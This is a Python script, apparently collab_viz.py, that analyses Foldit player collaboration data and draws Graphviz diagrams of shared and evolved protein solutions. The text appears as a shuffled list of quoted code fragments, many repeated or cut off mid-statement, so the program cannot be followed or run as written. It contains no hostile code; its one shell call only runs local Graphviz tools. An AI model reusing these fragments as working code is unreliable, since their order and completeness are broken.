min(g, key=lambda", "from foldit.foldit_data import get_relevant_sids from util import PDB_Info, get_data_value from typing import NamedTuple,", "groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) > 1]), []),", "data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df = data[data.pid == pid] pdb_infos =", "penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in evolves) >= target[1] else", "0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid:", "col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] * 0xff), int(col[2]", "True for uid, pdbs in shared.items(): gid = pdbs[0].gid num_ignored = len([p for", "else 'tab20') # for gid, c in zip(gids, cm.colors): # cdict[gid] = col_to_str(c)", "label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster", "argparse import os import csv import json import logging from itertools import groupby", "{} for pid in data.pid.unique(): print(pid) df = data[data.pid == pid] start =", "p in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup =", "for c in cur.children]) if __name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true')", "dot.subgraph(sg) # do it again, this time for people who just loaded in", "if s.sid in sids: return s.uid + \"evol\" + str(i) raise ValueError(\"evolver pdb", "colors): cdict[gid][uid] = c group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K':", "list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve in evolved_targets.items(): # dot.edge(uid,", "pdl) def remove_corrupted(pdb_infos): return [x for x in pdb_infos if not is_corrupted(x.pdl, x.uid)]", "== e.uid: i += 1 return cands[i] def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\"", "# for uid, evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid],", "# gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve in", "'#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved =", "in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()}", "collabs[pid].append(collab) return collabs # for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid)", "PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag: source", "as pd import numpy as np import matplotlib.pyplot as plt from graphviz import", "c in collab.children] # while len(front) > 0: # ntab, cur = front.pop()", "g in # uid_grouped if uid not in active_uids} # screen out anyone", "x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if", "evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs in shared.items(): gid = pdbs[0].gid num_ignored", "color assert len(colors) >= len(new_uids) for uid, c in zip(new_uids, colors): cdict[gid][uid] =", "for e in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for", "for x in d if int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]), lambda", "p in line.pdb_infos] if s.sid in sids: return s.uid + \"evol\" + str(i)", "if s.scoretype == \"1\": return s.uid for i, line in enumerate(lines): sids =", "uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy) child = Collaborator(uid,", "return all(p['actions'] == {} or p['header']['uid'] == uid or p['header']['uid'] == '0' or", "cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids) for uid, c in zip(new_uids, colors):", "dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values():", "# for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) #", "for k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))}", "get_relevant_sids from util import PDB_Info, get_data_value from typing import NamedTuple, Tuple, List, Dict", "colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for", "shared.items(): gid = pdbs[0].gid num_ignored = len([p for p in pdbs if \"{}@{:.2f}\".format(uid,", "in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g", "matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] == 9999.99", "in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels':", "\"group_{}\".format(gid)}) for gid in groups_uids} evolved = {} # create evolver nodes &", "active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if x.scoretype ==", "get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def", "key=lambda e: e.uid), lambda e: e.uid) # group by evolver uid_source_grouped = {", "for tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source =", "[col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color", "g in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))}", "dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled', 'fillcolor':", "evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for", "9999.99 or cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid: i += 1 return", "p in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) shared =", "import json import logging from itertools import groupby import pandas as pd import", "child_lookup): collabs = {} for pid in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid))", "in pdb_infos if not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors = {} for pid", "root_tag, []) children.append(child) for pdb in pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid)", "d if int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves", "d if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves", "if p.scoretype == '1' or is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy),", "collabs # for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag)", "# uid_source_grouped = { # uid: {k: min(g, key=lambda p: p.energy) for k,", "'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, # node_attr={'style': 'filled'}) as c: for p in pdbs:", "\"evol_target_lines\", df) for uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb", "{target for targets in uid_source_grouped.values() for target in targets} roots = sum(([p for", "(int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))), lambda p:", "dot | gvpack -array_c{} | neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True,", "sorted(([p for l in r.lines for p in l.pdb_infos] if r.lines else [])", "in evolved_targets] for pdbs in shared.values()), []) evolves_by_source = {tag: list(pdbs) for tag,", "print(collab.tag) # front = [(1, c) for c in collab.children] # while len(front)", "'#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] * 0xff), int(col[2] * 0xff)))", "def get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def", "key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for", "\"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid,", "= 0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {} or cands[i]['header']['uid'] ==", "import subprocess import argparse import os import csv import json import logging from", "import os import csv import json import logging from itertools import groupby import", "lambda e: e.uid) # group by evolver uid_source_grouped = { uid: {k: list(g)", "or (int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))), lambda", "Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag parent:", "{} # create evolver nodes & edges uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid),", "key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g in uid_grouped} # further", "(get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in uid_grouped} # further group by source active_uids", "# for sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges for shared", "return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] * 0xff), int(col[2] *", "colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start - start) / (end - start), 0.7)", "penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg)", "for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]:", "{uid: list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])}", "energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s:", "import pandas as pd import numpy as np import matplotlib.pyplot as plt from", "import logging from itertools import groupby import pandas as pd import numpy as", "remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) == 0 and", "data[data.pid == pid] pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for", "[x for x in pdb_infos if not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors =", "in sids] if sids else [], {c.name: c.energy * c.weight for c in", "uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs", "\"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): #", "evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy) child = Collaborator(uid, collab.gid, pdbs, {c.name:", "# graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids} # for uid, evolved_targets in", "get_source_tag(e))} for uid, g in uid_grouped} # further group by source evolved_targets =", "for gid in gids} # for uid, evolved_targets in uid_source_grouped.items(): # gid =", "gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{}", "= {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid", "children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s:", "l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) shared = {uid: list(pdbs)", "= get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for", "matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] ==", "label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start = min(e.timestamp for e in evolves)", "euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid] = [] for root in roots:", "remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if x.scoretype == '2' and", "in a shared solution but didn't do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda", "action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug: for pid in args.pids: render_collab(pid)", "gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve in evolved_targets.items():", "p in pdl) def remove_corrupted(pdb_infos): return [x for x in pdb_infos if not", "9999.99 for p in pdl) def remove_corrupted(pdb_infos): return [x for x in pdb_infos", "group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)]", "PDB_Info, get_data_value from typing import NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def", "% (int(col[0] * 0xff), int(col[1] * 0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid):", "root.gid, [soln_lookup[sid] for sid in sids] if sids else [], {c.name: c.energy *", "get_evolver_uid(s: PDB_Info, lines: list) -> str: if s.scoretype == \"1\": return s.uid for", "get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids] if", "for sid in sids] if sids else [], {c.name: c.energy * c.weight for", "= True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges", "if not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors = {} for pid in data.pid.unique():", "import colorsys import subprocess import argparse import os import csv import json import", "get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in # uid_grouped if", "child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight for c in best.energy_components},", "# create evolver nodes & edges uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid), lambda", "on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start =", "groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid) # uid_source_grouped = { # uid:", "{tag: {uid: list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x:", "import Digraph from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util import", "int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map(", "float] tag: ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) ->", "# for gid, c in zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids =", "for c in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child) for pdb", "for x in d if int(x.sharing_gid) > 1 or (int(x.sharing_gid) == 0 and", "4)), collab, root_tag, []) children.append(child) for pdb in pdbs: if get_tag(pdb) in evolves_by_source", "e in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg", "0 and x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d:", "in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy) child = Collaborator(uid, collab.gid, pdbs,", "in pdbs: if p.scoretype == '2' and not is_corrupted(p.pdl, p.uid): source = get_source(p)", "= \"box\" if p.scoretype == '1' or is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid,", "pdbs if p.scoretype == '1' and get_tag(p) in evolved_targets] for pdbs in shared.values()),", "for e in active_evolves + passive_evolves]) # cm = plt.get_cmap('tab10' if len(gids) <=", "output raw source, then use command line graphviz tools to fix cluster layout", "len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str energy: float class Collaborator(NamedTuple): uid:", "p in l.pdb_infos] if r.lines else []) + ([p for l in r.evol_target_lines", "(get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in # uid_grouped if uid not in active_uids}", "pandas as pd import numpy as np import matplotlib.pyplot as plt from graphviz", "didn't do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid)", "child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup): collabs = {} for", "gids} # for uid, evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid,", "_, uid in g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid)", "* 0xff))) def is_corrupted(pdl, uid): return all(p['actions'] == {} or p['header']['uid'] == uid", "# evolving_time = sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target),", "for target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] =", "lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) ->", "subprocess import argparse import os import csv import json import logging from itertools", "for x in pdb_infos if not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors = {}", "target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg)", "sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1, c)", "> 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup): collabs =", "parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug: for", "then use command line graphviz tools to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid)", "Collaborator, evolves_by_source: dict) -> List[Collaborator]: children = [] for uid, pdbs in evolves_by_source[root_tag].items():", "for cluster in group_clusters.values(): dot.subgraph(cluster) # output raw source, then use command line", "x.uid)] def render_collab(data): user_colors = {} for pid in data.pid.unique(): print(pid) df =", "children = [] for uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p:", "df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared =", "'1' or is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy),", "group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start", "# while len(front) > 0: # ntab, cur = front.pop() # print(\" \"*ntab,", "for e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start", "# front = [(1, c) for c in collab.children] # while len(front) >", "Digraph from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util import PDB_Info,", "sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d:", "e: euid_lookup[e.sid]) # group by evolver uid_source_grouped = { uid: {k: list(g) for", "p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid in", "return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list) -> str: if s.scoretype", "== '2' and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e:", "in # uid_grouped if uid not in active_uids} # screen out anyone who", "Dict[str, float] tag: ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info)", "lambda d: [x for x in d if int(x.sharing_gid) == 0 and x.scoretype", "+ 0.9 * (evoling_start - start) / (end - start), 0.7) # evolving_time", "{gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in", "{} for pid in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df = data[data.pid", "groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid]", "return collabs # for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) #", "g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g in", "gid in gids} for uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid,", "{k: list(g) for k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))}", "and x.pdl[-1]['actions'] == {}]), [])) # map gids to colors cdict = {}", "cdict[gid] = col_to_str(c) groups_uids = {gid: [uid for _, uid in g] for", "for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color in", "for x in d if int(x.sharing_gid) == 0 and x.scoretype == '2' and", "for x in d if int(x.sharing_gid) > 1]), []), key=lambda p: p.uid), lambda", "for root in roots: tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab", "in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\" if p.scoretype ==", "p.energy) for k, g in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda", "r.evol_lines else []), key=lambda p: p.timestamp), axis=1) shared = {uid: list(pdbs) for uid,", "cdict[gid] = {} group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c in", "List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1] i = 0", "e.uid), lambda e: e.uid) # group by evolver uid_source_grouped = { uid: {k:", "= c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'},", "passive_evolves]) # cm = plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20') # for", "{}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in evolves)", "groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g", "len(gids) <= 10 else 'tab20') # for gid, c in zip(gids, cm.colors): #", "source, then use command line graphviz tools to fix cluster layout outname =", "Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1] i = 0 while", "lambda e: euid_lookup[e.sid]) # group by evolver uid_source_grouped = { uid: {k: list(g)", "return children def get_team_structures(data, soln_lookup, child_lookup): collabs = {} for pid in data.pid.unique():", "in cur.children]) if __name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+')", "= {} # gids = set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid'] for", "{gid: [uid for _, uid in g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda", "# output raw source, then use command line graphviz tools to fix cluster", "and not is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 +", "util import PDB_Info, get_data_value from typing import NamedTuple, Tuple, List, Dict import matplotlib", "'tab20') # for gid, c in zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids", "evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids} #", "pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy) child = Collaborator(uid, collab.gid,", "shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in", "uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid) # group by evolver", "cur.tag) # front.extend([(ntab + 1, c) for c in cur.children]) if __name__ ==", "if sids else [], {c.name: c.energy * c.weight for c in root.energy_components}, tag,", "not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors = {} for pid in data.pid.unique(): print(pid)", "e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in #", "in d if int(x.sharing_gid) > 1 or (int(x.sharing_gid) == 0 and x.scoretype ==", "{uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in", "in sids: return s.uid + \"evol\" + str(i) raise ValueError(\"evolver pdb {} not", "pid in data.pid.unique(): print(pid) df = data[data.pid == pid] start = df.timestamps.apply(min).min() end", "# front.extend([(ntab + 1, c) for c in cur.children]) if __name__ == '__main__':", "style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values():", "p.scoretype == '2' and not is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color =", "= plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20') # for gid, c in", "in pdl) def remove_corrupted(pdb_infos): return [x for x in pdb_infos if not is_corrupted(x.pdl,", "evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3',", "in d if int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])}", "'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid),", "group by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape':", "def get_team_structures(data, soln_lookup, child_lookup): collabs = {} for pid in data.pid.unique(): logging.debug(\"getting team", "True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges for", "passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) ==", "new_uids = uids[:] for prev_uid, color in group_colors.items(): colors.remove(color) if prev_uid in new_uids:", "def get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) ->", "g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid,", "c.weight for c in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child) for", "label=uid) # for target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') #", "key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for uid,", "while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid: i", "c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color':", "get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag:", "evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes and", "# nodes and edges for shared solutions for uid, pdbs in shared.items(): gid", "= get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp - start)", "p: p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x", "p['header']['uid'] == '0' or p['header']['score'] == 9999.99 for p in pdl) def remove_corrupted(pdb_infos):", "import get_relevant_sids from util import PDB_Info, get_data_value from typing import NamedTuple, Tuple, List,", "and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) #", "# dot.subgraph(sg) # 